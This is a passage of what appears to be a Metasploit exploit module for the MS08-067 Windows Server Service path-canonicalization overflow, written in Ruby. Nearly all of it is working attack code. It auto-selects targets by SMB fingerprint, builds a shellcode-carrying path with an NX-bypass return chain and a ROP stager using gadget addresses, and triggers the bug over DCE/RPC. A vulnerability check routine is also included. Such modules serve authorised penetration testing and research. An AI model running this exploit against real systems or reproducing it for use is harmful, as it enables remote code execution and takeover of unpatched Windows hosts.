783 | # First obtain the value for the Ret element of the hash with the following command: 784 | # 785 | # $ msfpescan -j esi acgenral.dll 786 | # 787 | # Pick whatever address you like, just make sure it does not contain 00 0a 0d 5c 2f or 2e. 788 | # 789 | # Next, find the location of the function we use to disable NX. Use the following command: 790 | # 791 | # $ msfpescan -r "\x6A\x04\x8D\x45\x08\x50\x6A\x22\x6A\xFF" acgenral.dll 792 | # 793 | # This address should be placed into the DisableNX element of the target hash. 794 | # 795 | # The Scratch element of 0x00020408 should work on all versions of Windows 796 | # 797 | # The actual function we use to disable NX looks like this: 798 | # 799 | # push 4 800 | # lea eax, [ebp+arg_0] 801 | # push eax 802 | # push 22h 803 | # push 0FFFFFFFFh 804 | # mov [ebp+arg_0], 2 805 | # call ds:__imp__NtSetInformationProcess@16 806 | # 807 | # 808 | # *** WINDOWS XP NON-NX TARGETS *** 809 | # 810 | # 811 | # Instead of bypassing NX, just return directly to a "JMP ESI", which takes us to the short 812 | # jump, and finally the shellcode. 813 | # 814 | # 815 | # *** WINDOWS 2003 SP2 TARGETS *** 816 | # 817 | # 818 | # There are only two possible ways to return to NtSetInformationProcess on Windows 2003 SP2, 819 | # both of these are inside NTDLL.DLL and use a return method that is not directly compatible 820 | # with our call stack. To solve this, Brett Moore figured out a multi-step return call chain 821 | # that eventually leads to the NX bypass function. 822 | # 823 | # 824 | # *** WINDOWS 2000 TARGETS *** 825 | # 826 | # 827 | # No NX to bypass, just return directly to a "JMP EDX", which takes us to the short 828 | # jump, and finally the shellcode. 829 | # 830 | # 831 | # *** WINDOWS VISTA TARGETS *** 832 | # 833 | # Currently untested, will involve ASLR and NX, should be fun. 
834 | # 835 | # 836 | # *** NetprPathCanonicalize IDL *** 837 | # 838 | # 839 | # NET_API_STATUS NetprPathCanonicalize( 840 | # [in, string, unique] SRVSVC_HANDLE ServerName, 841 | # [in, string] WCHAR* PathName, 842 | # [out, size_is(OutbufLen)] unsigned char* Outbuf, 843 | # [in, range(0,64000)] DWORD OutbufLen, 844 | # [in, string] WCHAR* Prefix, 845 | # [in, out] DWORD* PathType, 846 | # [in] DWORD Flags 847 | # ); 848 | # 849 | 850 | def exploit 851 | begin 852 | connect 853 | smb_login 854 | rescue Rex::Proto::SMB::Exceptions::LoginError => e 855 | if e.message =~ /Connection reset/ 856 | print_error('Connection reset during login') 857 | print_error('This most likely means a previous exploit attempt caused the service to crash') 858 | return 859 | else 860 | raise e 861 | end 862 | end 863 | 864 | # Use a copy of the target 865 | mytarget = target 866 | 867 | if target['auto'] 868 | 869 | mytarget = nil 870 | 871 | print_status('Automatically detecting the target...') 872 | fprint = smb_fingerprint 873 | 874 | print_status("Fingerprint: #{fprint['os']} - #{fprint['sp']} - lang:#{fprint['lang']}") 875 | 876 | # Bail early on unknown OS 877 | if (fprint['os'] == 'Unknown') 878 | fail_with(Failure::NoTarget, 'No matching target') 879 | end 880 | 881 | # Windows 2000 is mostly universal 882 | if (fprint['os'] == 'Windows 2000') 883 | mytarget = targets[1] 884 | end 885 | 886 | # Windows XP SP0/SP1 is mostly universal 887 | if fprint['os'] == 'Windows XP' and fprint['sp'] == 'Service Pack 0 / 1' 888 | mytarget = targets[2] 889 | end 890 | 891 | # Windows 2003 SP0 is mostly universal 892 | if fprint['os'] == 'Windows 2003' and fprint['sp'].empty? 
893 | mytarget = targets[3] 894 | end 895 | 896 | # Windows 2003 R2 is treated the same as 2003 897 | if (fprint['os'] == 'Windows 2003 R2') 898 | fprint['os'] = 'Windows 2003' 899 | end 900 | 901 | # Service Pack match must be exact 902 | if (not mytarget) and fprint['sp'].index('+') 903 | print_error('Could not determine the exact service pack') 904 | print_status("Auto-targeting failed, use 'show targets' to manually select one") 905 | disconnect 906 | return 907 | end 908 | 909 | # Language Pack match must be exact or we default to English 910 | if (not mytarget) and fprint['lang'] == 'Unknown' 911 | print_status('We could not detect the language pack, defaulting to English') 912 | fprint['lang'] = 'English' 913 | end 914 | 915 | # Normalize the service pack string 916 | fprint['sp'].gsub!(/Service Pack\s+/, 'SP') 917 | 918 | unless mytarget 919 | targets.each do |t| 920 | # Prefer AlwaysOn NX over NX, and NX over non-NX 921 | if t.name =~ /#{fprint['os']} #{fprint['sp']} #{fprint['lang']} \(AlwaysOn NX\)/ 922 | mytarget = t 923 | break 924 | end 925 | if t.name =~ /#{fprint['os']} #{fprint['sp']} #{fprint['lang']} \(NX\)/ 926 | mytarget = t 927 | break 928 | end 929 | end 930 | end 931 | 932 | unless mytarget 933 | fail_with(Failure::NoTarget, 'No matching target') 934 | end 935 | 936 | print_status("Selected Target: #{mytarget.name}") 937 | end 938 | 939 | # 940 | # Build the malicious path name 941 | # 942 | 943 | padder = [*('A'..'Z')] 944 | pad = 'A' 945 | while pad.length < 7 946 | c = padder[rand(padder.length)] 947 | next if pad.index(c) 948 | pad += c 949 | end 950 | 951 | prefix = '\\' 952 | path = '' 953 | server = Rex::Text.rand_text_alpha(rand(8) + 1).upcase 954 | 955 | # 956 | # Windows 2003 SP2 (NX) targets 957 | # 958 | if mytarget['RetDec'] 959 | 960 | jumper = Rex::Text.rand_text_alpha(70).upcase 961 | jumper[ 0, 4] = [mytarget['RetDec']].pack('V') # one more to Align and make room 962 | 963 | jumper[ 4, 4] = [mytarget['RetDec']].pack('V') # 4 
more for space 964 | jumper[ 8, 4] = [mytarget['RetDec']].pack('V') 965 | jumper[ 12, 4] = [mytarget['RetDec']].pack('V') 966 | jumper[ 16, 4] = [mytarget['RetDec']].pack('V') 967 | 968 | jumper[ 20, 4] = [mytarget['RetPop']].pack('V') # pop to EBP 969 | jumper[ 24, 4] = [mytarget['DisableNX']].pack('V') 970 | 971 | jumper[ 56, 4] = [mytarget['JmpESP']].pack('V') 972 | jumper[ 60, 4] = [mytarget['JmpESP']].pack('V') 973 | jumper[ 64, 2] = "\xeb\x02" # our jump 974 | jumper[ 68, 2] = "\xeb\x62" # original 975 | 976 | path = 977 | Rex::Text.to_unicode('\\') + 978 | 979 | # This buffer is removed from the front 980 | Rex::Text.rand_text_alpha(100) + 981 | 982 | # Shellcode 983 | payload.encoded + 984 | 985 | # Relative path to trigger the bug 986 | Rex::Text.to_unicode('\\..\\..\\') + 987 | 988 | # Extra padding 989 | Rex::Text.to_unicode(pad) + 990 | 991 | # Writable memory location (static) 992 | [mytarget['Scratch']].pack('V') + # EBP 993 | 994 | # Return to code which disables NX (or just the return) 995 | [mytarget['RetDec']].pack('V') + 996 | 997 | # Padding with embedded jump 998 | jumper + 999 | 1000 | # NULL termination 1001 | "\x00" * 2 1002 | 1003 | # 1004 | # Windows XP SP2/SP3 ROP Stager targets 1005 | # 1006 | elsif mytarget['UseROP'] 1007 | 1008 | rop = generate_rop(mytarget['UseROP']) 1009 | 1010 | path = 1011 | Rex::Text.to_unicode('\\') + 1012 | 1013 | # This buffer is removed from the front 1014 | Rex::Text.rand_text_alpha(100) + 1015 | 1016 | # Shellcode 1017 | payload.encoded + 1018 | 1019 | # Relative path to trigger the bug 1020 | Rex::Text.to_unicode('\\..\\..\\') + 1021 | 1022 | # Extra padding 1023 | Rex::Text.to_unicode(pad) + 1024 | 1025 | # ROP Stager 1026 | rop + 1027 | 1028 | # Padding (skipped) 1029 | Rex::Text.rand_text_alpha(2) + 1030 | 1031 | # NULL termination 1032 | "\x00" * 2 1033 | 1034 | # 1035 | # Windows 2000, XP (NX), and 2003 (NO NX) targets 1036 | # 1037 | else 1038 | 1039 | jumper = Rex::Text.rand_text_alpha(70).upcase 
1040 | jumper[ 4, 4] = [mytarget.ret].pack('V') 1041 | jumper[50, 8] = make_nops(8) 1042 | jumper[58, 2] = "\xeb\x62" 1043 | 1044 | path = 1045 | Rex::Text.to_unicode('\\') + 1046 | 1047 | # This buffer is removed from the front 1048 | Rex::Text.rand_text_alpha(100) + 1049 | 1050 | # Shellcode 1051 | payload.encoded + 1052 | 1053 | # Relative path to trigger the bug 1054 | Rex::Text.to_unicode('\\..\\..\\') + 1055 | 1056 | # Extra padding 1057 | Rex::Text.to_unicode(pad) + 1058 | 1059 | # Writable memory location (static) 1060 | [mytarget['Scratch']].pack('V') + # EBP 1061 | 1062 | # Return to code which disables NX (or just the return) 1063 | [mytarget['DisableNX'] || mytarget.ret].pack('V') + 1064 | 1065 | # Padding with embedded jump 1066 | jumper + 1067 | 1068 | # NULL termination 1069 | "\x00" * 2 1070 | 1071 | end 1072 | 1073 | handle = dcerpc_handle( 1074 | '4b324fc8-1670-01d3-1278-5a47bf6ee188', '3.0', 1075 | 'ncacn_np', ["\\#{datastore['SMBPIPE']}"] 1076 | ) 1077 | 1078 | dcerpc_bind(handle) 1079 | 1080 | stub = 1081 | NDR.uwstring(server) + 1082 | NDR.UnicodeConformantVaryingStringPreBuilt(path) + 1083 | NDR.long(rand(1024)) + 1084 | NDR.wstring(prefix) + 1085 | NDR.long(4097) + 1086 | NDR.long(0) 1087 | 1088 | # NOTE: we don't bother waiting for a response here... 
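# (tail of #exploit — the method's header and the bulk of its body are earlier in the file)
    print_status('Attempting to trigger the vulnerability...')
    dcerpc.call(0x1f, stub, false)

    # Cleanup
    handler
    disconnect
  end

  # Probes the target for MS08-067 without triggering the overflow: it
  # sends srvsvc opnum 0x1f (path canonicalization) a short relative path
  # and classifies the host by the status DWORD in the reply.
  #
  # Returns one of Msf::Exploit::CheckCode:
  #   Vulnerable - the reply status is 0x0052005c
  #   Safe       - the bind is refused (e.g. Samba) or the status differs
  #   Unknown    - connection/login fails, or the reply is missing/truncated
  def check
    begin
      connect
      smb_login
    rescue Rex::ConnectionError => e
      vprint_error("Connection failed: #{e.class}: #{e}")
      return Msf::Exploit::CheckCode::Unknown
    rescue Rex::Proto::SMB::Exceptions::LoginError => e
      # A reset at login time is read as the Server Service being down,
      # which is what an earlier crashed exploit attempt leaves behind.
      if e.message =~ /Connection reset/
        vprint_error('Connection reset during login')
        vprint_error('This most likely means a previous exploit attempt caused the service to crash')
        return Msf::Exploit::CheckCode::Unknown
      else
        raise e
      end
    end

    #
    # Build the malicious path name
    # 5b878ae7 "db @eax;g"
    prefix = '\\'
    path =
      "\x00\\\x00/" * 0x10 +
      Rex::Text.to_unicode('\\') +
      Rex::Text.to_unicode('R7') +
      Rex::Text.to_unicode('\\..\\..\\') +
      Rex::Text.to_unicode('R7') +
      "\x00" * 2

    # Random upper-case server name, 1..8 characters.
    server = Rex::Text.rand_text_alpha(rand(8) + 1).upcase

    handle = dcerpc_handle('4b324fc8-1670-01d3-1278-5a47bf6ee188', '3.0',
      'ncacn_np', ["\\#{datastore['SMBPIPE']}"]
    )

    begin
      # Samba doesn't have this handle and returns an ErrorCode
      dcerpc_bind(handle)
    rescue Rex::Proto::SMB::Exceptions::ErrorCode => e
      vprint_error("SMB error: #{e.message}")
      return Msf::Exploit::CheckCode::Safe
    end

    vprint_status('Verifying vulnerable status... (path: 0x%08x)' % path.length)

    stub =
      NDR.uwstring(server) +
      NDR.UnicodeConformantVaryingStringPreBuilt(path) +
      NDR.long(8) +
      NDR.wstring(prefix) +
      NDR.long(4097) +
      NDR.long(0)

    resp = dcerpc.call(0x1f, stub)

    # Cleanup (done before parsing so a bad reply still releases the session)
    simple.client.close
    simple.client.tree_disconnect
    disconnect

    # The status DWORD is read from offset 4; without this guard a nil or
    # shorter-than-8-byte reply raises NoMethodError / yields nil instead
    # of a verdict.
    if resp.nil? || resp.length < 8
      vprint_error('No or truncated response to the canonicalization request')
      return Msf::Exploit::CheckCode::Unknown
    end

    error = resp[4, 4].unpack('V')[0]

    if (error == 0x0052005c) # \R :)
      return Msf::Exploit::CheckCode::Vulnerable
    else
      vprint_error('System is not vulnerable (status: 0x%08x)' % error)
      return Msf::Exploit::CheckCode::Safe
    end
  end

  # Builds the ROP stager used by the 'UseROP' targets from gadgets in
  # ACGENRAL.DLL at the fixed base 0x6f880000 (the chain only works if the
  # DLL is actually loaded there).
  #
  # version - ACGENRAL.DLL file version selecting the gadget offsets; only
  #           '5.1.2600.2180' (XP SP2) and '5.1.2600.5512' (XP SP3) are known.
  #
  # Returns the stager as a String of packed little-endian DWORDs.
  # Raises via fail_with when the version has no offset table or a gadget
  # name is missing from it.
  def generate_rop(version)
    free_byte = "\x90"
    # free_byte = "\xcc"

    # create a few small gadgets
    # ; pop edx; pop ecx; ret
    gadget1 = free_byte + "\x5a\x59\xc3"
    # mov edi, eax; add edi,0xc; push 0x40; pop ecx; rep movsd
    gadget2 = free_byte + "\x89\xc7" + "\x83\xc7\x0c" + "\x6a\x7f" + "\x59" + "\xf2\xa5" + free_byte
    # ; ; jmp $+0x5c
    gadget3 = "\xcc" + free_byte + "\xeb\x5a"

    # gadget2:
    # get eax into edi
    # adjust edi
    # get 0x7f in ecx
    # copy the data
    # jmp to it
    #
    # gadget2 is 12 bytes, so this yields exactly three DWORDs (dws[0..2]).
    dws = gadget2.unpack('V*')

    ##
    # Create the ROP stager, pfew.. Props to corelanc0d3r!
    # This was no easy task due to space limitations :-/
    # -jduck
    ##
    module_name = 'ACGENRAL.DLL'
    module_base = 0x6f880000

    # Gadget name => RVA, keyed by DLL version; the names are the same in
    # both tables so the meta-chain below works unchanged for each.
    rvasets = {}
    # XP SP2
    rvasets['5.1.2600.2180'] = {
      # call [imp_HeapCreate] / mov [0x6f8b8024], eax / ret
      'call_HeapCreate' => 0x21064,
      'add eax, ebp / mov ecx, 0x59ffffa8 / ret' => 0x2e546,
      'pop ecx / ret' => 0x2e546 + 6,
      'mov [eax], ecx / ret' => 0xd182,
      'jmp eax' => 0x19b85,
      'mov [eax+8], edx / mov [eax+0xc], ecx / mov [eax+0x10], ecx / ret' => 0x10976,
      'mov [eax+0x10], ecx / ret' => 0x10976 + 6,
      'add eax, 8 / ret' => 0x29a14
    }

    # XP SP3
    rvasets['5.1.2600.5512'] = {
      # call [imp_HeapCreate] / mov [0x6f8b02c], eax / ret
      'call_HeapCreate' => 0x21286,
      'add eax, ebp / mov ecx, 0x59ffffa8 / ret' => 0x2e796,
      'pop ecx / ret' => 0x2e796 + 6,
      'mov [eax], ecx / ret' => 0xd296,
      'jmp eax' => 0x19c6f,
      'mov [eax+8], edx / mov [eax+0xc], ecx / mov [eax+0x10], ecx / ret' => 0x10a56,
      'mov [eax+0x10], ecx / ret' => 0x10a56 + 6,
      'add eax, 8 / ret' => 0x29c64
    }

    # HeapCreate ROP Stager from ACGENRAL.DLL 5.1.2600.2180
    # Strings are gadget names resolved through rvasets; Integers are
    # emitted literally.
    rop = [
      # prime ebp (adjustment distance)
      0x00018000,

      # get some RWX memory via HeapCreate
      'call_HeapCreate',
      0x01040110, # flOptions (gets & with 0x40005)
      0x01010101,
      0x01010101,

      # adjust the returned pointer
      'add eax, ebp / mov ecx, 0x59ffffa8 / ret',

      # setup gadget1
      'pop ecx / ret',
      gadget1.unpack('V').first,
      'mov [eax], ecx / ret',

      # execute gadget1
      'jmp eax',

      # setup gadget2 (via gadget1)
      dws[0],
      dws[1],
      'mov [eax+8], edx / mov [eax+0xc], ecx / mov [eax+0x10], ecx / ret',

      # setup part3 of gadget2
      'pop ecx / ret',
      dws[2],
      'mov [eax+0x10], ecx / ret',

      # execute gadget2
      'add eax, 8 / ret',
      'jmp eax',

      # gadget3 gets executed after gadget2 (luckily)
      gadget3.unpack('V').first
    ]

    # convert the meta rop into concrete bytes
    rvas = rvasets[version]
    # Without this an unknown version surfaces as NoMethodError on nil
    # inside the map! below rather than as a clear module failure.
    fail_with(Failure::NoTarget, "No #{module_name} gadget table for version #{version.inspect}") unless rvas

    rop.map! { |e|
      if e.kind_of? String
        # Meta-replace (RVA)
        fail_with(Failure::BadConfig, "Unable to locate key: \"#{e}\"") unless rvas[e]
        module_base + rvas[e]

      elsif e == :unused
        # Randomize (no entry in rop is :unused at present, so this
        # branch is currently never taken)
        rand_text(4).unpack('V').first

      else
        # Literal
        e
      end
    }

    ret = rop.pack('V*')

    # check badchars?
    # idx = Rex::Text.badchar_index(ret, payload_badchars)
    # NOTE(review): the stager is not screened against the payload bad
    # characters here; verify offline if the gadget tables are ever changed.

    ret
  end
end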